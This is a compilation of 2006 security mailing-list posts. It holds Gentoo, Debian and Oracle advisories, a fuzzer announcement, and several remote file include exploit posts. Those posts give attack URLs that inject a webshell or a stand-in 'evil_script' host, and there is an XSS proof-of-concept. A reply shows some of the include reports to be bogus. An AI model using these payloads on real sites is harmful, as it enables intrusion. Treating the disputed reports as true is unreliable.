Re: adobe php sdk Remote File Include Vulnerabilities

[Mailinglists Address]

>
> www.site.com/adobe_php_sdk_path/libraries/amfphp/amf-core/custom/CachedGateway.php?AMFPHP_BASE=sh3ll?_
>
>
>
>   
All of these reports are bogus (Smarty 2.6.1, CSLH2), as the original
poster obviously does not understand how constants work.

As taken from the PHP manual:

"Constants may only be defined using the *define()*
 function, not by
simple assignment;"

Re: Smarty-2.6.1 Remote File Include Vulnerabilities

[J. Carlos Nieto]

On Mon, 2006-10-23 at 16:30 +, [EMAIL PROTECTED] 

>  
> require_once './config.php';
> require_once SMARTY_DIR . 'Smarty.class.php';
> require_once 'PHPUnit.php';

SMARTY_DIR is a constant, isn't it?

> 
> 
> http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll?
> 

But you are passing a variable with value "Sh3ll".

And since variable != constant it won't work, at least in the piece of
code you gave us.

Where is the bug?

-- 
La civilización no suprime la barbarie, la perfecciona. -Voltaire
http://xiam.underlife.org

__
Correo Yahoo!
Espacio para todos tus mensajes, antivirus y antispam ¡gratis! 
Regístrate ya - http://correo.yahoo.com.mx/ 

[ GLSA 200610-12 ] Apache mod_tcl: Format string vulnerability

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Apache mod_tcl: Format string vulnerability
  Date: October 24, 2006
  Bugs: #151359
ID: 200610-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A format string vulnerabilty has been found in Apache mod_tcl, which
could lead to the remote execution of arbitrary code.

Background
==

Apache mod_tcl is a TCL interpreting module for the Apache 2.x web
server.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  www-apache/mod_tcl   < 1.0.1 >= 1.0.1

Description
===

Sparfell discovered format string errors in calls to the set_var
function in tcl_cmds.c and tcl_core.c.

Impact
==

A remote attacker could exploit the vulnerability to execute arbitrary
code with the rights of the user running the Apache server.

Workaround
==

There is no known workaround at this time.

Resolution
==

All mod_tcl users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apache/mod_tcl-1.0.1"

References
==

  [ 1 ] CVE-2006-4154
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4154

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-12.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpt2OcQ3QlyF.pgp
Description: PGP signature

InteliEditor (sys_path) Remote File Include Vulnerability

[xorontr]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

InteliEditor (sys_path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

Tum islam aleminin Ramazan Bayrami Mubarek oLsun..!

Ne mutlu türküm diyene

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include("$sys_path/cfg.editor.inc.php");
include("$sys_path/lang.$lng.inc.php");


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/lib.editor.inc.php?sys_path=http://evil_script?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, 
k1tk4t, x_w0x

Tesekkurler: DJR, mdx, R3D4C!D, sakkure, ERNE:)

www.milw0rm.com
www.team-rootshell.com
www.cyber-warrior.org
irc.milw0rm.com #milw0rm

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

script down: 
http://puzzle.dl.sourceforge.net/sourceforge/intelieditor/intelieditor.zip

# milw0rm.com [2006-10-24]

orj adv: http://www.milw0rm.com/exploits/2630

adobe php sdk Remote File Include Vulnerabilities

[crackers_child]

#
adobe php sdk  Remote File Include Vulnerabilities
 
#

By Crackers_Child

[EMAIL PROTECTED]

www.sibersavacilar.com

#

Download Script

http://blogs.adobe.com/mikepotter/adobe_php_sdk-060817.zip


#

#
Bug in CachedGateway.php

include_once("app/Gateway.php");
include_once(AMFPHP_BASE . "custom/CachedExecutionAction.php");

#
Exploit
#

www.site.com/adobe_php_sdk_path/libraries/amfphp/amf-core/custom/CachedGateway.php?AMFPHP_BASE=sh3ll?_





#

Greetz:All My Friends !

#

CSLH2.9.9 Remote File Include Vulnerabilities

[crackers_child]

#
CSLH2.9.9  Remote File Include Vulnerabilities
 
#

By Crackers_Child

[EMAIL PROTECTED]

www.sibersavacilar.com

#

Download Script

http://craftysyntax.com/CSLH2.9.9.zip


#

#
Bug 

include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");

#
Exploit
#

www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?

#

Greetz:All My Friends !

#

who needs a server ...

[auto113922]

for phsihing and phile downloading specially when server from 
"location: I don't know" :) this is kind of cool normally used for 
base64 inline images I think ? Firefox 2.0 and Opera 9.02 you can 
invoke the apps and play from there check .asx in temp with foo.asf 
maybe you can do some things else

test

test

test

http://ie7.com/firefox.jpg>">test

test

test

test

test

test


--



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

Re: Application orders Linux in WebAPP v0.9.9.2.1

[nicolascamino]

this bug was discovered by Status-x:

http://www.securityfocus.com/bid/13637/info

and exploit by nikyt0x:

http://www.soulblack.com.ar/repo/tools/sbwebapp.txt

[vuln.sg] CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities

[vulnpost-remove]

[vuln.sg] Vulnerability Research Advisory

CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities

by Tan Chew Keong
Release Date: 2006-10-24

Summary
---
Two vulnerabilities have been found in CruiseWorks. When exploited, the 
vulnerabilities allow an authenticated user to retrieve arbitrary files 
accessible to the web server process and to execute arbitrary code with 
privileges of the IIS IUSR_MACHINE account.

Tested Versions
---
CruiseWorks Groupware version 1.09c and 1.09d.

Details
---
http://vuln.sg/cruiseworks109d-en.html
http://vuln.sg/cruiseworks109d-jp.html

ProgSys verion 0.151 XSS vulnerability

[security]

25/10/06

Vigilon Advisory
http://www.vigilon.com/advisories/vg-progsys-24-10-2006.txt

---

Application: ProgSys
Web Site:http://www.boesch-it.de/sw/php-scripts/progsys/english/download.php
Versions:0.151 and below
Platform:linux, windows, freebsd, sun
Bug: Cross Site Scripting.
Fix Available: Yes
---

1) Introduction
2) Bug
3) The Code
4) Fix
5) About Vigilon
6) Disclaimer
7) Feedback

===
1) Introduction
===

ProgSys is a support system for application development. 
Features: Data stored in MySQL, administration interface, support for multiple 
languages, 
support for multiple instances in one database, own header/footer can be 
defined for every program, 
bug tracking, ToDo list, changelogs, reference list, feature requests, download 
counter and 
newsletter for programs. 

==
2) Bug
==

Cross-Site Scripting.


3) Proof of concept.


almost every file is possible to create XSS.

example:

/progsys/admin/index.php/>">alert("XSS")

==
4) Fix
==

The author claims these problems were fixed at Version 0.152


==
5) About Vigilon
==

Vigilon Inc. is a security software company that helps organizations, 
and the security providers that serve them, 
reduce business risk while lowering operational security costs.
using the Continual Vigilance platform.

=
6) Disclaimer
=

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

=
7) FeedBack
=

Please send suggestions, updates, and comments to:

[EMAIL PROTECTED]
http://www.vigilon.com

---

Credit:

Moran Zavdi

[SECURITY] [DSA 1199-1] New webmin packages fix input validation problems

[Noah Meyerhans]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1199-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
October 23, 2006
- 

Package: webmin
Vulnerability  : multiple
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2005-3912 CVE-2006-3392 CVE-2006-4542
BugTraq ID : 15629 18744 19820
Debian Bug : 341394 381537 391284

Several vulnerabilities have been identified in webmin, a web-based
administration toolkit.

CVE-2005-3912
A format string vulnerability in miniserv.pl could allow an
attacker to cause a denial of service by crashing the
application or exhausting system resources, and could
potentially allow arbitrary code execution.

CVE-2006-3392
Improper input sanitization in miniserv.pl could allow an
attacker to read arbitrary files on the webmin host by providing
a specially crafted URL path to the miniserv http server.

CVE-2006-4542
Improper handling of null characters in URLs in miniserv.pl
could allow an attacker to conduct cross-site scripting attacks,
read CGI program source code, list local directories, and
potentially execute arbirary code.

For the stable distribution (sarge), these problems have been fixed in
version 1.180-3sarge1

Webmin is not included in unstable (sid) or testing (etch), so these
problems are not present.

We recommend that you upgrade your webmin (1.180-3sarge1) package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1.dsc
Size/MD5 checksum:  703 5e723deaccb3db60794e0cb385666992
  http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180.orig.tar.gz
Size/MD5 checksum:  2261496 ff19d5500955302455e517cb2942c9d0
  
http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1.diff.gz
Size/MD5 checksum:31458 f8fe363e7ccd8fe4072d84cd86a3510e

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/w/webmin/webmin-core_1.180-3sarge1_all.deb
Size/MD5 checksum:  1121200 8fa7064325ded44e7f8dbd226b81d9dd
  
http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1_all.deb
Size/MD5 checksum:  1097552 34d96210d581dde8ffea7be82e0897f4


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFPWexYrVLjBFATsMRAoUMAJoD7NOzzETLIGE+1vYShqxQDZVT4gCfcYfm
f1fqxSNrMBz71bBqOA2hlFk=
=849e
-END PGP SIGNATURE-

Month of Kernel Bugs and fsfuzzer release (0.6)

[L . M . H .]

Hi,

Back in March of this year, I was working on fuzzing-related code,
mostly about kernel-land testing (ex. filesystem code). I gave the
initial code of a tool to a Red Hat employee in charge of QA related
tasks (after showing some issues in iso9660 and jfs). During the next
months the code was subject of cosmetic changes, and he added some
improvements (split the test procedure in another file, added gfs and
hfs support, improved usability).

Few days ago the interest suddenly raised as he found out that nearly
all the filesystems supported in the latest Linux kernel revision are
affected by one or more issues (at very least, a denial of service
concerning a specific operation such as read, write, etc, normally
causing a so-called softlock-up/oops or a hardlock/panic/fs
corruption).

Another Red Hat employee, excited about the tool, 'leaked' the URL to
the LKML [2][3] (even if code was available in a publicly accessible
repository it wasn't being distributed actively). As usual, it didn't
bother much the people there ;-)

I had interest on tracking down the issues found with the tool, not
just for curiosity. The feeling about 'silent patches' [1] became
stronger when I realized that there was no intention for doing this
publicly by other parties (cough). This is sadly, a common practice
everywhere.

Thanks to this and some other goodies, The Month of Kernel Bugs will
start on 1st November, and will be announced this next Monday (30
Oct). I'm looking for other people interested on providing bugs for
XNU (also for the "good old" Darwin), win32, *BSD, etc. If you
want to contribute, drop me a line. Please note that only 'fresh',
unknown bugs will be accepted, and submissions should be briefly
documented. The goal is disclosing a kernel bug (DoS, privilege
escalation, whatever interesting) on a daily basis for November.

Watch out for silent patches in the git repositories, obscured
bugzilla entries and the usual FUD. It doesn't hurt to get ready for
the usual madness. Note that 'silent' doesn't necessarily mean
'covered up'. But just improperly described/not considered a security
issue.

Anyway, regarding the tool, these are the filesystems currently
supported (depends on the packages you have installed in the system
but these are all the supported ones right now, as of 0.6):
[EMAIL PROTECTED] fsfuzzer-0.6-lmh]# ./fsfuzz --help
./fsfuzz 
(ext3|ext2|vfat|msdos|swap|squashfs|xfs|hfs|gfs2|ntfs|reiserfs|jffs2|iso9660|cramfs|
jfs|minix|bfs)

Tarball available at: http://projects.info-pull.com/mokb/fsfuzzer-0.6-lmh.tgz
And today's partial bugs list:
http://projects.info-pull.com/mokb/fs-bugs-23-10-2006.txt.asc
Key will be made available after November. This is for verification
purposes. Hopefully they will still work by that time, so it shouldn't
be necessary.

Usual disclaimer applies. If you sell or get money from a bug found
with this tool, shame on you ;-). Also, most of the bugs you can
actually find with it are already known, but it's always nice to hear
about new details (and if you've ported it to some other platform,
better). You're more than welcome to send them. They will be
considered for release in the MoKB, crediting accordingly.

Kind regards.

[1]: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=209907
[2]: http://www.ussg.iu.edu/hypermail/linux/kernel/0610.2/1941.html
[3]: http://www.ussg.iu.edu/hypermail/linux/kernel/0610.2/2169.html

[ GLSA 200610-11 ] OpenSSL: Multiple vulnerabilities

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: OpenSSL: Multiple vulnerabilities
  Date: October 24, 2006
  Bugs: #145510
ID: 200610-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


OpenSSL contains multiple vulnerabilities including the possible remote
execution of arbitrary code.

Background
==

OpenSSL is a toolkit implementing the Secure Sockets Layer, Transport
Layer Security protocols and a general-purpose cryptography library.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  dev-libs/openssl  < 0.9.8d  >= 0.9.8d
*>= 0.9.7l

Description
===

Tavis Ormandy and Will Drewry, both of the Google Security Team,
discovered that the SSL_get_shared_ciphers() function contains a buffer
overflow vulnerability, and that the SSLv2 client code contains a flaw
leading to a crash. Additionally Dr. Stephen N. Henson found that the
ASN.1 handler contains two Denial of Service vulnerabilities: while
parsing an invalid ASN.1 structure and while handling certain types of
public key.

Impact
==

An attacker could trigger the buffer overflow vulnerability by sending
a malicious suite of ciphers to an application using the vulnerable
function, and thus execute arbitrary code with the rights of the user
running the application. An attacker could also consume CPU and/or
memory by exploiting the Denial of Service vulnerabilities. Finally a
malicious server could crash a SSLv2 client through the SSLv2
vulnerability.

Workaround
==

There is no known workaround at this time.

Resolution
==

All OpenSSL 0.9.8 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8d"

All OpenSSL 0.9.7 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.7l"

References
==

  [ 1 ] CVE-2006-2937
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937
  [ 2 ] CVE-2006-2940
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940
  [ 3 ] CVE-2006-3738
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738
  [ 4 ] CVE-2006-4343
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpxrdqPxNP1V.pgp
Description: PGP signature

[ GLSA 200610-10 ] ClamAV: Multiple Vulnerabilities

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: ClamAV: Multiple Vulnerabilities
  Date: October 24, 2006
  Bugs: #151561
ID: 200610-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


ClamAV is vulnerable to a heap-based buffer overflow potentially
allowing remote execution of arbitrary code and a Denial of Service.

Background
==

ClamAV is a GPL virus scanner.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-antivirus/clamav  < 0.88.5  >= 0.88.5

Description
===

Damian Put and an anonymous researcher reported a potential heap-based
buffer overflow vulnerability in rebuildpe.c responsible for the
rebuilding of an unpacked PE file, and a possible crash in chmunpack.c
in the CHM unpacker.

Impact
==

By sending a malicious attachment to a mail server running ClamAV, or
providing a malicious file to ClamAV through any other method, a remote
attacker could cause a Denial of Service and potentially the execution
of arbitrary code with the permissions of the user running ClamAV.

Workaround
==

There is no known workaround at this time.

Resolution
==

All ClamAV users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.88.5"

References
==

  [ 1 ] Original commit log
http://sourceforge.net/project/shownotes.php?release_id=455799
  [ 2 ] CVE-2006-4182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4182

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpUwXe1pBR5b.pgp
Description: PGP signature

Modify Data via Inline Views

[ak]

NameModify Data via Inline Views (8107967) [DB09]
Systems AffectedOracle 9i - 10g Rel. 2
SeverityHigh Risk
CategoryUnauthorized Access
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Advisory18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_modify_data_via_inline_views.html

Details
###
Updates, deletes and inserts are possible with least-privilege via inline 
views. A user with create session only can insert/update/delete data (e.g. the 
dual table). This bug is similar but not identical to the bug which was fixed 
in the July 2006 CPU (Modify Data via views). No workarounds available.


Samples
###
delete from (specially crafted inline view)
insert into (specially crafted inline view)
update (specially crafted inline view)


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
24-jul-2006 Oracle secalert was informed about a variant of the create view bug.
18-oct-2006 Oracle published CPU October 2006 [DB09]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html

SQL Injection in package SYS.DBMS_SQLTUNE_INTERNAL

[ak]

NameSQL Injection in package SYS.DBMS_SQLTUNE_INTERNAL (6980745) [DB10]
Systems AffectedOracle 8i-10g Rel. 2
SeverityHigh Risk
CategorySQL Injection
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Advisory18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_sqltune_internal.html

Details
###
The package DBMS_SQLTUNE_INTERNAL contains SQL injection vulnerabilities. in 
I_SET_TUNING_PARAMETER and SELECT_SQLSET. Oracle fixed this by using bind 
variables in their dynamic SQL statements.


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
1-nov-2005 Oracle secalert was informed
18-oct-2006 Oracle published CPU October 2006 [DB13]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html